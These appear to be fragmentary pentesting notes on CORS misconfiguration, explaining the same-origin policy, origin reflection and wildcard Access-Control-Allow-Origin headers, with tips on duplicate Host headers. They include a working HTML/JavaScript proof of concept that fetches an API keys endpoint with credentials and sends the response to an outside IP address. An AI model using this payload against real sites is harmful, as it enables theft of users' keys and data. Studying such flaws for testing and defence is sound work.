- Cross origin resource sharing
- This can used to retrieve data from API/websites which shouldn't be able to access the legit website.
- Meaning an attacker might be able to show some data with some evil stuff on/from the legit website.
What is SOP?
Same origin policy prevents:
The browser will send a request with an Origin header and the server can decide whether or not it should allow this request. The server can allow the browser to make CORS request by responding with the header Access-Control-Allow-Origin: and a list of hostnames. By default, the browser will send unauthenticated requests unless the server told it not to using Access-Control-Allow-Credentials: true.
But the vulnerability arises when server respond with Access-Control-Allow-Origin: *
- Sometime what happens that websites return the
originheader as the
Access-Control-Allow-Origin, because simplicity developer had decided to not maintain any white list.
So test with the headers and see if you can get the server to display your
[https://evil.com](https://evil.com) in the
<html> <body> <script> var xhr = new XMLHttpRequest(); xhr.open("POST", "http://api-ptl-ad42da05-c93d6931.libcurl.so//api/v1/keys", false); xhr.withCredentials = true; xhr.send(); var a=xhr.responseText; var xhr2 = new XMLHttpRequest(); xhr2.open("GET", "http://220.127.116.11"+a,false); xhr2.withCredentials=true; xhr2.send(); </script> </body> </html>
This is the example in which we
Try to use
HOSTheader it is possible that the email ID you get would be containing URL with
- Try to use multiple hosts like
jsx HOST: legit.com HOST: evil.com